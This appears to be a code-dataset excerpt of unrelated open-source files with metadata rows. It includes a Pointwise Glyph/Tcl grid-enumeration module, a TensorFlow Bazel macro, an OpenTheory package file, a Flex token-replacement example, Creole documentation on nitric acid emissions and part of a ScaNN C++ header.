if { "" != $revVarName } {
upvar 1 $revVarName rev
}
return [cell::getEdges [set cell [pwio::getCell $enumNdx]] $minFirstOrder rev]
}
#========================================================================
namespace export getMinFirstCellEdges
proc getMinFirstCellEdges { enumNdx {cellVarName ""} {revVarName ""} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
if { "" != $revVarName } {
upvar 1 $revVarName rev
}
return [cell::getEdges [set cell [pwio::getCell $enumNdx]] 1 rev]
}
#========================================================================
namespace export getFaceEdges
proc getFaceEdges { face {cellVarName ""} {minFirstOrder 0} {revVarName ""} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
if { "" != $revVarName } {
upvar 1 $revVarName rev
}
set cell $face
return [cell::getFaceEdges $face $minFirstOrder rev]
}
#========================================================================
namespace export getMinFirstFaceEdges
proc getMinFirstFaceEdges { face {cellVarName ""} {revVarName ""} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
if { "" != $revVarName } {
upvar 1 $revVarName rev
}
set cell $face
return [cell::getFaceEdges $face 1 rev]
}
#========================================================================
namespace export getCellFaces
proc getCellFaces { enumNdx {cellVarName ""} {minFirstOrder 0} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
return [cell::getFaces [set cell [pwio::getCell $enumNdx]] $minFirstOrder]
}
#========================================================================
namespace export getMinFirstCellFaces
proc getMinFirstCellFaces { enumNdx {cellVarName ""} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
return [cell::getFaces [set cell [pwio::getCell $enumNdx]] 1]
}
#========================================================================
namespace export getCellType
proc getCellType {enumNdx} {
array set cellMap {
"2e3" "tri"
"2e4" "quad"
"3e4" "tet"
"3e5" "pyramid"
"3e6" "prism"
"3e8" "hex"
}
set cell [pwio::getCell $enumNdx]
set key "$pwio::caeDim\e[llength $cell]"
return $cellMap($key)
}
#========================================================================
namespace export getFaceType
proc getFaceType {face} {
if {[llength $face] == 3} {
return "tri"
} elseif {[llength $face] == 4} {
return "quad"
}
}
#========================================================================
namespace export getEntityCell
proc getEntityCell { ent ndx {localCellVarName ""} } {
if { "" != $localCellVarName } {
upvar 1 $localCellVarName localCell
}
#puts "--- $ndx"
set ret [list]
foreach locNdx [set localCell [$ent getCell $ndx]] {
lappend ret [pwio::getCoordIndex [utils::makeCoordFromEntIndex $ent $locNdx]]
}
return $ret
}
#========================================================================
namespace export getEntityCellEdges
proc getEntityCellEdges { ent ndx {cellVarName ""} {minFirstOrder 0} {revVarName ""} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
if { "" != $revVarName } {
upvar 1 $revVarName rev
}
return [cell::getEdges [set cell [getEntityCell $ent $ndx]] $minFirstOrder rev]
}
#========================================================================
namespace export getMinFirstEntityCellEdges
proc getMinFirstEntityCellEdges { ent ndx {cellVarName ""} {revVarName ""} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
if { "" != $revVarName } {
upvar 1 $revVarName rev
}
return [cell::getEdges [set cell [getEntityCell $ent $ndx]] 1 rev]
}
#========================================================================
namespace export dim
proc getCaeDim {} {
variable caeDim
return $caeDim
}
#========================================================================
namespace export getSelectType
proc getSelectType {} {
variable caeDim
array set selInfo { \
2 Domain \
3 Block \
}
return $selInfo($caeDim)
}
#========================================================================
namespace export reset
proc reset {} {
# misc variables
variable selEnts
variable caeDim
variable perimPtCountCache
set selEnts [list]
set caeDim [pw::Application getCAESolverDimension]
array set perimPtCountCache {}
# coords db variables
variable coordSingleEnt
variable entToCoordTotalsOffset
variable coordTotals
variable totalOwnedPts
variable ndxCoordTotals
variable offsetGlobToLocalGetCoord
variable prevCoordEntName
variable offsetGlobToLocalGetCoordIndex
set coordSingleEnt ""
array set entToCoordTotalsOffset {}
set coordTotals [list]
set totalOwnedPts 0
set ndxCoordTotals 0
set offsetGlobToLocalGetCoord 0
set prevCoordEntName "null"
variable offsetGlobToLocalGetCoordIndex 0
# cells db variables
variable cellSingleEnt
variable totalCellCount
variable cellTotals
variable entToCellTotalsOffset
variable ndxCellTotals
variable offsetGlobToLocalGetCell
variable prevCellEntName
variable offsetGlobToLocalGetCellIndex
set cellSingleEnt ""
set totalCellCount 0
set cellTotals [list]
array set entToCellTotalsOffset {}
set ndxCellTotals 0
set offsetGlobToLocalGetCell 0
set prevCellEntName "@null"
set offsetGlobToLocalGetCellIndex 0
}
#========================================================================
namespace export fixCoord
proc fixCoord { coordVarName } {
upvar 1 $coordVarName coord
# force coord to {i j k ent} format
switch -exact [llength $coord] {
2 { set coord [linsert $coord 1 1 1] }
3 { set coord [linsert $coord 2 1] }
4 { set dummy 1 }
default { utils::assert false "pwio::fixCoord: Bad coord value ($coord)" }
}
return $coord
}
#========================================================================
namespace export coordMapLower
proc coordMapLower { coord } {
set ent [coordGetEntity $coord]
pwio::fixCoord coord
switch -exact [$ent getType] {
pw::Node {
return [list]
}
pw::Connector {
set i [lindex $coord 0]
if { $i == 1 } {
return [list [list 1 1 1 [$ent getNode Begin]]]
} elseif { $i == [$ent getPointCount] } {
return [list [list 1 1 1 [$ent getNode End]]]
}
return [list]
}
}
return [pw::Grid mapLower $coord]
}
#========================================================================
namespace export mapToOwner
proc mapToOwner { coord {trace 0} } {
set conTol [pw::Grid getConnectorTolerance]
set origXyz [pw::Grid getXYZ $coord]
set lowerCoords [coordMapLower $coord]
while { [llength $lowerCoords] > 0 } {
if { $trace } {
puts "\{$coord\} [entGetName [pw::Grid getEntity $coord]] ([pw::Grid getXYZ $coord])"
foreach crd $lowerCoords {
puts "---> $crd [entGetName [pw::Grid getEntity $crd]] ([pw::Grid getXYZ $crd])"
}
}
# If more than one, just grab first. Eventually, only one, owning
# ent will be returned and next call to coordMapLower will return an
# empty list ending the loop
#set coord [lindex $lowerCoords 0]
#set lowerCoords [coordMapLower $coord]
# BUG WORKAROUND - sometimes an invalid lower con is returned!
# Search returned lower entities making sure lower ent has same xyz
set hadMismatch 0
foreach coord $lowerCoords {
if { [utils::xyzEqual $origXyz [pw::Grid getXYZ $coord] $conTol] } {
if { $hadMismatch } {
#puts "Using coord \{$coord\} after mismatch"
set hadMismatch 0
}
break
}
set hadMismatch 1
#puts "mismatch! \{$coord\} [entGetName [pw::Grid getEntity $coord]] ([pw::Grid getXYZ $coord]) != $origXyz"
}
utils::assert !$hadMismatch "Could not find matching coord! \{$coord\}"
set lowerCoords [coordMapLower $coord]
}
return $coord
}
#========================================================================
namespace export coordGetEntity
proc coordGetEntity { coord } {
return [lindex $coord end]
}
#========================================================================
namespace export coordGetIjk
proc coordGetIjk { coord } {
return [lrange [pwio::fixCoord coord] 0 2]
}
#========================================================================
namespace eval Level {
variable Block 3
variable Domain 2
variable Connector 1
variable Node 0
}
#========================================================================
namespace export entGetLevel
proc entGetLevel { entOrBaseType } {
# usage:
# entGetLevel Block ;# returns 3
# entGetLevel ::pw::Connector_3 ;# returns 1
array set rank {Block 3 Domain 2 Connector 1 Node 0}
if { "" == [array get rank $entOrBaseType] } {
# ent is NOT a base ent type. Assume it is an entity
set entOrBaseType [utils::entBaseType $entOrBaseType]
}
return $rank($entOrBaseType)
}
#========================================================================
namespace export coordGetLevel
proc coordGetLevel { coord } {
return [entGetLevel [coordGetEntity $coord]]
}
#========================================================================
namespace export coordMapToEntity
proc coordMapToEntity { fromCoord toEnt coordsVarName } {
upvar 1 $coordsVarName coords
set coords {}
coordMapToLevel $fromCoord [entGetLevel $toEnt] locCoords
foreach coord $locCoords {
if { [coordGetEntity $coord] == $toEnt } {
lappend coords [pwio::fixCoord coord]
}
}
return [llength $coords]
}
#========================================================================
namespace export coordMapToLevel
proc coordMapToLevel { coord toLevel coordsVarName } {
upvar 1 $coordsVarName coords
set coords [list]
array set uniqueCoords {} ;# tracks unique coords
set coordLevel [coordGetLevel $coord]
if { $toLevel == $coordLevel } {
# Simple case of the coordinate already at the correct toLevel
lappend coords [pwio::fixCoord coord]
} else {
set currCoords [list $coord] ;# prime the pump
set nextCoords [list]
if { $coordLevel > $toLevel } {
# map coord to a lower level coord
while { [llength $currCoords] > 0 } {
# For each higher toLevel coordinate, map down and store in nextCoords
set nextCoords [list]
foreach coord $currCoords {
set nextCoords [concat $nextCoords [coordMapLower $coord]]
}
# Clear out currCoords and append the appropriate
# coordinates from nextCoords to currCoords
set currCoords [list]
foreach coord $nextCoords {
set coordLevel [coordGetLevel $coord]
if { $coordLevel > $toLevel } {
# Still too high. Append coord to currCoords so while
# loop will process on next pass
lappend currCoords $coord
} elseif { $coordLevel == $toLevel } {
# found ent at target toLevel - keep it
pwio::fixCoord coord
# set uniqueCoords(1,1,1,pw::entname) $coord
set uniqueCoords([join $coord ,]) $coord
}
}
}
} else {
# map coord to a higher level coord
while { [llength $currCoords] > 0 } {
set nextCoords [list]
foreach coord $currCoords {
set nextCoords [concat $nextCoords [pw::Grid mapHigher $coord]]
}
# Clear out currCoords and append the appropriate
# coordinates from nextCoords to currCoords
set currCoords [list]
foreach coord $nextCoords {
set coordLevel [coordGetLevel $coord]
if { $coordLevel < $toLevel } {
# Still too low. Append coord to currCoords so while
# loop will process on next pass
lappend currCoords $coord
} elseif { $coordLevel == $toLevel } {
# found ent at target toLevel - keep it
pwio::fixCoord coord
# set uniqueCoords(1,1,1,pw::entname) $coord
set uniqueCoords([join $coord ,]) $coord
}
}
}
}
# load unique coordinates into coords
foreach {key coord} [array get uniqueCoords] {
lappend coords $coord
}
}
return [llength $coords]
}
#--------------- PRIVATE -------------------
#========================================================================
proc build { } {
return [expr {[buildCoords] && [buildCells]}]
}
#========================================================================
proc buildCoords { } {
variable selEnts
variable coordSingleEnt
variable entToCoordTotalsOffset
variable coordTotals
variable totalOwnedPts
variable ndxCoordTotals
variable offsetGlobToLocalGetCoord
variable prevCoordEntName
variable offsetGlobToLocalGetCoordIndex
# load $selEnts and all their lower level entities into allEnts
set ret [utils::getSupportEnts $selEnts allEnts true]
if { $ret } {
if { 1 == [llength $selEnts] } {
set coordSingleEnt [lindex $selEnts 0]
# check if the entity pt count is equal to the total number of owned
# points. if so, then we can use the single entity optimization
set totalOwnedPts 0
foreach ent $allEnts {
incr totalOwnedPts [utils::getOwnedPointCount $ent]
}
if { $totalOwnedPts != [$coordSingleEnt getPointCount] } {
set coordSingleEnt ""
}
}
if { "" == $coordSingleEnt } {
set allEnts [utils::sortEntsByType $allEnts]
# Go through the entities and:
# Add them to the entToCoordTotalsOffset array
# Add the runningTotal+ent pair to the coordTotals list
set totalOwnedPts 0
foreach ent $allEnts {
set ownedPts [utils::getOwnedPointCount $ent]
if { $ownedPts > 0 } {
incr totalOwnedPts $ownedPts
set offset [llength $coordTotals]
set entToCoordTotalsOffset($ent) $offset
lappend coordTotals [list $ownedPts $totalOwnedPts $ent]
}
}
}
# initialize the cache to the beginning of the coordTotals array
# used by getCoord
set ndxCoordTotals 0
set offsetGlobToLocalGetCoord 0
# initialize the entities cache to the beginning of the entToCoordTotalsOffset array
# used by getIndex
set prevCoordEntName "@null" ;# lastEnt_
set offsetGlobToLocalGetCoordIndex 0
} else {
utils::assert false "getSupportEnts FAILED"
}
return $ret
}
#========================================================================
proc buildCells { } {
variable selEnts
variable cellSingleEnt
variable totalCellCount
variable cellTotals
variable entToCellTotalsOffset
variable ndxCellTotals
variable offsetGlobToLocalGetCell
variable prevCellEntName
variable offsetGlobToLocalGetCellIndex
set ret 1
if { 1 == [llength $selEnts] } {
set cellSingleEnt [lindex $selEnts 0]
set totalCellCount [$cellSingleEnt getCellCount]
} else {
# Go through the selected entities and:
# Add them to the entToCellTotalsOffset array
# Add the runningTotal+ent pair to the cellTotals list
set totalCellCount 0
foreach ent $selEnts {
set cellCount [$ent getCellCount]
if { $cellCount > 0 } {
incr totalCellCount $cellCount
set offset [llength $cellTotals]
set entToCellTotalsOffset($ent) $offset
lappend cellTotals [list $cellCount $totalCellCount $ent]
}
}
# initialize the cache to the beginning of the cellTotals array
# used by pwio::getCell
set ndxCellTotals 0
set offsetGlobToLocalGetCell 0
# initialize the cells cache to the beginning of the cells array
# used by pwio::getCellIndex
set prevCellEntName "@null"
set offsetGlobToLocalGetCellIndex 0
}
return $ret
}
#========================================================================
proc getCoordEnumEntCount {} {
variable coordTotals
variable coordSingleEnt
if { "" != $coordSingleEnt } {
set ret 1
} else {
set ret [llength $coordTotals]
}
return $ret
}
#========================================================================
proc getCoordEnumEnt { ndx } { ;# 0 to getCoordEnumEntCount-1
variable coordTotals
variable coordSingleEnt
if { "" != $coordSingleEnt } {
utils::assert "$ndx == 0 " "getCoordEnumEnt: Invalid single ent index ($ndx)"
set ret $coordSingleEnt
} else {
utils::assert "$ndx >= 0 && $ndx < [getCoordEnumEntCount]" \
"getCoordEnumEnt: Invalid multi ent index ($ndx)"
set ret [lindex $coordTotals $ndx 2]
}
return $ret
}
#========================================================================
proc getCoordEnumOffset { ndx } { ;# 0 to getCoordEnumEntCount-1
utils::assert "$ndx >= 0 && $ndx < [getCoordEnumEntCount]" \
"getCoordEnumOffset: Invalid index ($ndx)"
variable coordTotals
variable coordSingleEnt
if { 0 == $ndx } {
set ret 0
} elseif { "" != $coordSingleEnt } {
# 0 is the only valid index for single ent
utils::assert false "getCoordEnumOffset: Invalid single ent index ($ndx)"
} else {
# if here, ndx >= 1 and multi ent pwio
# offset is running owned total of previous item in coordTotals
set ret [lindex $coordTotals [incr ndx -1] 1]
}
return $ret
}
#========================================================================
proc getCoordEnumRange { ndx } { ;# 0 to getCoordEnumEntCount-1
variable coordTotals
variable coordSingleEnt
if { 0 == $ndx } {
set offset 0
} elseif { "" != $coordSingleEnt } {
# 0 is the only valid index for single ent
utils::assert false "getCoordEnumRange: Invalid single ent index ($ndx)"
} else {
utils::assert "$ndx > 0 && $ndx < [getCoordEnumEntCount]" \
"getCoordEnumRange: Invalid multi ent index ($ndx)"
set offset [getCoordEnumOffset $ndx]
}
# if here, ndx is valid
# set to local entity owned indices
set startNdx 1
set endNdx [getCoordEnumNumOwnedPts $ndx]
# incr by offset to make global enum indices
return [list [incr startNdx $offset] [incr endNdx $offset]]
}
#========================================================================
proc getCoordEnumNumOwnedPts { ndx } { ;# 0 to getCoordEnumEntCount-1
utils::assert "$ndx >= 0 && $ndx < [getCoordEnumEntCount]" \
"getCoordEnumNumOwnedPts: Invalid index ($ndx)"
variable coordTotals
variable coordSingleEnt
if { "" != $coordSingleEnt } {
set ret [$coordSingleEnt getPointCount]
} else {
set ret [lindex $coordTotals $ndx 0]
}
return $ret
}
#========================================================================
proc getCellEnumEntCount {} {
variable cellTotals
variable cellSingleEnt
if { "" != $cellSingleEnt } {
set ret 1
} else {
set ret [llength $cellTotals]
}
return $ret
}
#========================================================================
proc getCellEnumEnt { ndx } { ;# 0 to getCellEnumEntCount-1
variable cellTotals
variable cellSingleEnt
if { "" != $cellSingleEnt } {
utils::assert "$ndx == 0 " "getCellEnumEnt: Invalid single ent index ($ndx)"
set ret $cellSingleEnt
} else {
utils::assert "$ndx >= 0 && $ndx < [getCellEnumEntCount]" \
"getCellEnumEnt: Invalid multi ent index ($ndx)"
set ret [lindex $cellTotals $ndx 2]
}
return $ret
}
#========================================================================
proc getCellEnumOffset { ndx } { ;# 0 to getCellEnumEntCount-1
utils::assert "$ndx >= 0 && $ndx < [getCellEnumEntCount]" \
"getCellEnumOffset: Invalid index ($ndx)"
variable cellTotals
variable cellSingleEnt
if { 0 == $ndx } {
set ret 0
} elseif { "" != $cellSingleEnt } {
# 0 is the only valid index for single ent
utils::assert false "getCellEnumOffset: Invalid single ent index ($ndx)"
} else {
# if here, ndx >= 1 and multi ent pwio
# offset is running owned total of previous item in cellTotals
set ret [lindex $cellTotals [incr ndx -1] 1]
}
return $ret
}
#========================================================================
proc getCellEnumRange { ndx } { ;# 0 to getCellEnumEntCount-1
variable cellTotals
variable cellSingleEnt
if { 0 == $ndx } {
set offset 0
} elseif { "" != $cellSingleEnt } {
# 0 is the only valid index for single ent
utils::assert false "getCellEnumRange: Invalid single ent index ($ndx)"
} else {
utils::assert "$ndx > 0 && $ndx < [getCellEnumEntCount]" \
"getCellEnumRange: Invalid multi ent index ($ndx)"
set offset [getCellEnumOffset $ndx]
}
# if here, ndx is valid
# set to local entity owned indices
set startNdx 1
set endNdx [getCellEnumNumOwnedPts $ndx]
# incr by offset to make global enum indices
return [list [incr startNdx $offset] [incr endNdx $offset]]
}
#========================================================================
proc getCellEnumNumOwnedPts { ndx } { ;# 0 to getCellEnumEntCount-1
utils::assert "$ndx >= 0 && $ndx < [getCellEnumEntCount]" \
"getCellEnumNumOwnedPts: Invalid index ($ndx)"
variable cellTotals
variable cellSingleEnt
if { "" != $cellSingleEnt } {
set ret [$cellSingleEnt getPointCount]
} else {
set ret [lindex $cellTotals $ndx 0]
}
return $ret
}
#========================================================================
proc entGetCoordEnumNumOwnedPts { ent } {
variable coordSingleEnt
variable entToCoordTotalsOffset
if { $ent == $coordSingleEnt } {
set ret [$coordSingleEnt getPointCount]
} elseif { "" != $coordSingleEnt } {
utils::assert false "entGetCoordEnumNumOwnedPts: Single entity mismatch ($coordSingleEnt != $ent)"
} elseif { "" == [array get entToCoordTotalsOffset $ent] } {
utils::assert false "entGetCoordEnumNumOwnedPts: Invalid entity ($ent)"
} else {
set ret [getCoordEnumNumOwnedPts $entToCoordTotalsOffset($ent)]
}
return $ret
}
#========================================================================
proc entGetCachedNumPerimeterPts { ent } {
variable perimPtCountCache
if { "" == [array get perimPtCountCache $ent] } {
set perimPtCountCache($ent) [utils::getPerimeterPointCount $ent]
}
return $perimPtCountCache($ent)
}
#========================================================================
proc entIjkToOwnedIndex { ent ijk } { ;# ijk must be 1-based
variable coordSingleEnt
if { "" != $coordSingleEnt } {
utils::assert "[string equal $coordSingleEnt $ent]" "entOwnedIndexToIjk: Single entity mismatch ($coordSingleEnt != $ent)"
return [utils::entIjkToIndex $ent $ownedNdx]
}
set ret 0
lassign $ijk i j k
switch -exact [$ent getType] {
pw::Node {
utils::assert "1 == $i" "entIjkToOwnedIndex: Invalid Node ijk \{$ijk\} ($ent)"
set ret $i
}
pw::Connector {
utils::assert "[$ent isInteriorIndex $i]" \
"entIjkToOwnedIndex: Invalid Connector ijk \{$ijk\} ($ent)"
set ret [incr i -1]
}
pw::DomainUnstructured {
utils::assert "[$ent isInteriorIndex $i]" \
"entIjkToOwnedIndex: Invalid DomainUnstructured ijk \{$ijk\} ($ent)"
set ret [incr i -[entGetCachedNumPerimeterPts $ent]]
}
pw::DomainStructured {
utils::assert "[$ent isInteriorIndex [list $i $j]]" \
"entIjkToOwnedIndex: Invalid DomainStructured ijk \{$ijk\} ($ent)"
set entDims [$ent getDimensions]
lassign $entDims idim jdim
# convert ent ij dims to owned ij dims
set ownedDims [list [incr idim -2] [incr jdim -2]]
# convert ij to owned ij
incr i -1
incr j -1
set ret [utils::ijkToIndexStructured [list $i $j] $ownedDims]
}
pw::BlockUnstructured {
utils::assert "[$ent isInteriorIndex $i]" \
"entIjkToOwnedIndex: Invalid BlockUnstructured ijk \{$ijk\} ($ent)"
set ret [incr i -[entGetCachedNumPerimeterPts $ent]]
}
pw::BlockStructured {
utils::assert "[$ent isInteriorIndex $ijk]" \
"entIjkToOwnedIndex: Invalid BlockStructured ijk \{$ijk\} ($ent)"
set entDims [$ent getDimensions]
lassign $entDims idim jdim kdim
# convert ent ijk dims to owned ijk dims
set ownedDims [list [incr idim -2] [incr jdim -2] [incr kdim -2]]
# convert ij to owned ij
incr i -1
incr j -1
incr k -1
set ret [utils::ijkToIndexStructured [list $i $j $k] $ownedDims]
}
pw::BlockExtruded {
utils::assert "[$ent isInteriorIndex $ijk]" \
"entIjkToOwnedIndex: Invalid BlockExtruded ijk \{$ijk\} ($ent)"
set numBasePerimPts [entGetCachedNumPerimeterPts [$ent getFace JMinimum]]
set entDims [$ent getDimensions]
lassign $entDims idim jdim kdim
# convert ent ijk dims to owned ijk dims
set ownedDims [list [incr idim -$numBasePerimPts] $jdim [incr kdim -2]]
# convert ijk to owned ijk
incr i -$numBasePerimPts
# j stays 1
incr k -1
set ret [utils::ijkToIndexStructured [list $i $j $k] $ownedDims]
}
default {
utils::assert false "entOwnedIndexToIjk: bad etype '[$ent getType]'"
}
}
return $ret
}
#========================================================================
proc entOwnedIndexToIjk { ent ownedNdx } { ;# ownedNdx must be 1-based
variable coordSingleEnt
if { "" != $coordSingleEnt } {
utils::assert "[string equal $coordSingleEnt $ent]" \
"entOwnedIndexToIjk: Single entity mismatch ($coordSingleEnt != $ent)"
return [entIndexToIjk $ent $ownedNdx]
}
utils::assert "$ownedNdx >= 1 && $ownedNdx <= [pwio::entGetCoordEnumNumOwnedPts $ent]" \
"entOwnedIndexToIjk: Bad Owned Index $ownedNdx for $ent"
set ret 0
switch -exact [$ent getType] {
pw::Node {
set ret [list $ownedNdx 1 1]
}
pw::Connector {
set ret [list [incr ownedNdx 1] 1 1]
}
pw::DomainUnstructured {
set ret [list [expr {$ownedNdx + [entGetCachedNumPerimeterPts $ent]}] 1 1]
}
pw::DomainStructured {
set entDims [$ent getDimensions]
lassign $entDims idim jdim
# the -2 will reduce ent ij dims to owned ij dims
set ownedDims [list [incr idim -2] [incr jdim -2]]
# convert ownedNdx to owned{i j} and assign to i j vars
lassign [utils::indexToIjkStructured $ownedNdx $ownedDims] i j
# ent{i j} = owned{i j}+{1 1}
set ret [list [incr i] [incr j] 1]
}
pw::BlockUnstructured {
set ret [list [expr {$ownedNdx + [entGetCachedNumPerimeterPts $ent]}] 1 1]
}
pw::BlockStructured {
set entDims [$ent getDimensions]
lassign $entDims idim jdim kdim
# the -2 will reduce ent ijk dims to owned ijk dims
set ownedDims [list [incr idim -2] [incr jdim -2] [incr kdim -2]]
# convert ownedNdx to owned{i j k} and assign to i j k vars
lassign [utils::indexToIjkStructured $ownedNdx $ownedDims] i j k
# ent{i j k} = owned{i j k}+{1 1 1}
set ret [list [incr i] [incr j] [incr k]]
}
pw::BlockExtruded {
set numBasePerimPts [entGetCachedNumPerimeterPts [$ent getFace JMinimum]]
set entDims [$ent getDimensions]
lassign $entDims idim jdim kdim
# reduce ent ijk dims to owned ijk dims
set ownedDims [list [incr idim -$numBasePerimPts] $jdim [incr kdim -2]]
# convert ownedNdx to owned{i j k}
lassign [utils::indexToIjkStructured $ownedNdx $ownedDims] i j k
# ent{i j k} = owned{i j k}+{numBasePerimPts 0 1}
set ret [list [incr i $numBasePerimPts] $j [incr k]]
}
default {
utils::assert false "entOwnedIndexToIjk: bad etype '[$ent getType]'"
}
}
return $ret
}
#--------------- DEBUG -------------------
#========================================================================
proc printSummary {} {
variable selEnts
variable caeDim
variable entToCoordTotalsOffset
variable coordTotals
variable coordSingleEnt
variable entToCellTotalsOffset
variable cellTotals
variable cellSingleEnt
puts "pwio Summary:"
puts "totalPts = [getCoordCount]"
puts "totalCells = [getCellCount]"
puts ""
utils::printEntInfo "Selected Entities:" $selEnts
puts ""
puts "Grid Points:"
if { "" != $coordSingleEnt } {
puts "\$coordSingleEnt=[utils::entGetName $coordSingleEnt] ($coordSingleEnt)"
#getSupportEnts $coordSingleEnt supEnts
#printEntInfo "Single Ent: Lower Level Entities" [utils::sortEntsByType $supEnts] $caeDim $selEnts
} else {
puts "| ndx | ownPts | runTot | Range | EntDims | Name (entity) |"
puts "|-----|--------|--------|-----------------|------------|------------------------------------------|"
foreach tot $coordTotals {
lassign $tot entTot runTot ent
set totalsOffset $entToCoordTotalsOffset($ent)
set range [getCoordEnumRange $totalsOffset]
set entDims [utils::entGetDimensions $ent]
set name "[utils::entGetName $ent] ($ent)"
puts [format "| %3d | %6d | %6d | %15.15s | %10.10s | %-40.40s |" \
$totalsOffset $entTot $runTot $range $entDims $name]
}
}
puts ""
puts "Grid Cells:"
if { "" != $cellSingleEnt } {
puts "\$cellSingleEnt=[utils::entGetName $cellSingleEnt] ($cellSingleEnt)"
} else {
puts "| ndx | Cells | runTot | Range | EntDims | Name (entity) |"
puts "|-----|--------|--------|-----------------|------------|------------------------------------------|"
foreach tot $cellTotals {
lassign $tot entTot runTot ent
set totalsOffset $entToCellTotalsOffset($ent)
set range [getCellEnumRange $totalsOffset]
set entDims [utils::entGetDimensions $ent]
set name "[utils::entGetName $ent] ($ent)"
puts [format "| %3d | %6d | %6d | %15.15s | %10.10s | %-40.40s |" \
$totalsOffset $entTot $runTot $range $entDims $name]
}
}
}
}
}
# END SCRIPT
#
# DISCLAIMER:
# TO THE MAXIMUM EXTENT PERMITTED BY APPLICABLE LAW, POINTWISE DISCLAIMS
# ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED
# TO, IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE, WITH REGARD TO THIS SCRIPT. TO THE MAXIMUM EXTENT PERMITTED
# BY APPLICABLE LAW, IN NO EVENT SHALL POINTWISE BE LIABLE TO ANY PARTY
# FOR ANY SPECIAL, INCIDENTAL, INDIRECT, OR CONSEQUENTIAL DAMAGES
# WHATSOEVER (INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOSS OF
# BUSINESS INFORMATION, OR ANY OTHER PECUNIARY LOSS) ARISING OUT OF THE
# USE OF OR INABILITY TO USE THIS SCRIPT EVEN IF POINTWISE HAS BEEN
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGES AND REGARDLESS OF THE
# FAULT OR NEGLIGENCE OF POINTWISE.
#
| Glyph | 4 | smola/language-dataset | data/github.com/pointwise/GridCoordEnum/3807bade6eff04871e489562ae8587f59eb7de97/pwio.glf | [
"MIT"
] |
# Platform-specific build configurations.
"""
TF profiler build macros for use in OSS.
"""
load("//tensorflow:tensorflow.bzl", "cc_header_only_library")
def tf_profiler_alias(target_dir, name):
return target_dir + "oss:" + name
def tf_profiler_pybind_cc_library_wrapper(name, actual, **kwargs):
"""Wrapper for cc_library used by tf_python_pybind_extension.
This wrapper ensures that cc libraries headers are made available to pybind
code, without creating ODR violations in the dynamically linked case. The
symbols in these deps symbols should be linked to, and exported by, the core
pywrap_tensorflow_internal.so
"""
cc_header_only_library(name = name, deps = [actual], **kwargs)
| Python | 4 | EricRemmerswaal/tensorflow | tensorflow/core/profiler/builds/oss/build_config.bzl | [
"Apache-2.0"
] |
name: hol-compatibility
version: 1.0
description: Interface between OpenTheory Standard Library and HOL4
author: Ramana Kumar <ramana@member.fsf.org>
license: GPL
requires: base
show: "Data.Bool"
bool {
package: hol-bool-1.0
}
sat {
import: bool
package: hol-sat-1.0
}
combin {
import: bool
package: hol-combin-1.0
}
main {
import: bool
import: sat
import: combin
}
| Isabelle | 3 | dwRchyngqxs/HOL | src/opentheory/compat/hol-compatibility.thy | [
"BSD-3-Clause"
] |
/*
* myname2.lex : A sample Flex program
* that does token replacement.
*/
%{
#include <stdio.h>
%}
%x STRING
%%
\" ECHO; BEGIN(STRING);
<STRING>[^\"\n]* ECHO;
<STRING>\" ECHO; BEGIN(INITIAL);
%NAME { printf("%s",getenv("LOGNAME")); }
%HOST { printf("%s",getenv("HOST")); }
%HOSTTYPE { printf("%s",getenv("HOSTTYPE"));}
%HOME { printf("%s",getenv("HOME")); }
| Lex | 4 | DemiMarie/flex | examples/manual/myname2.lex | [
"BSD-4-Clause-UC"
] |
This category provides data and a methodology for the measurement and monitoring of greenhouse gas emissions resulting from the production of nitric acid (HNO,,3,,). The methodology is sourced from the WRI Greenhouse Gas protocol [[http://www.ghgprotocol.org/calculation-tools/all-tools|worksheets]] but ultimately follows the IPCC 2006 [[http://www.ipcc-nggip.iges.or.jp/public/2006gl/index.html|Guidelines for National Greenhouse Gas Inventories]]. This category represents //Tiers 1, 2 amd 3// approaches of the IPCC guidelines.
N,,2,,O emissions from the production of nitric acid depend on the quantity of nitric acid produced, plant design, burner conditions and on the amount of N,,2,,O destroyed in any subsequent abatement process.
This methodology not cover direct emissions from the combustion of fossil fuel occurring during the production of nitric acid or indirect emissions from the purchase of energy used for nitric acid production.
----
==How to use this category==
===Selecting an emissions scenario===
Use the drill-down //**plantType**// to select the type of plant.
===Specifying activity data===
Specify the required profile item values listed below.
===Results and calculation===
The quantities returned represent the greenhouse gas emissions associated with the quantity and parameters specified. The following quantities are returned:
* //**N2O**//: absolute quantity of N,,2,,O emissions for the quantity specified
* //**CO2e**//: CO,,2,,e emissions (N,,2,,O emissions converted using the appropriate [[Greenhouse_gases_Global_warming_potentials|global warming potential]])
| Creole | 0 | OpenAMEE/datasets | business/processes/production/nitricAcid/documentation.creole | [
"MIT"
] |
// Copyright 2021 The Google Research Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#ifndef SCANN_UTILS_INTRINSICS_HORIZONTAL_SUM_H_
#define SCANN_UTILS_INTRINSICS_HORIZONTAL_SUM_H_
#include "scann/utils/intrinsics/simd.h"
namespace research_scann {
namespace fallback {
SCANN_INLINE float HorizontalSum(Simd<float> a) { return a.Unwrap(); }
SCANN_INLINE float HorizontalSum(Simd<double> a) { return a.Unwrap(); }
template <typename FloatT>
SCANN_INLINE void HorizontalSum2X(Simd<FloatT> a, Simd<FloatT> b,
FloatT* resulta, FloatT* resultb) {
*resulta = a.Unwrap();
*resultb = b.Unwrap();
}
template <typename FloatT>
SCANN_INLINE void HorizontalSum4X(Simd<FloatT> a, Simd<FloatT> b,
Simd<FloatT> c, Simd<FloatT> d,
FloatT* resulta, FloatT* resultb,
FloatT* resultc, FloatT* resultd) {
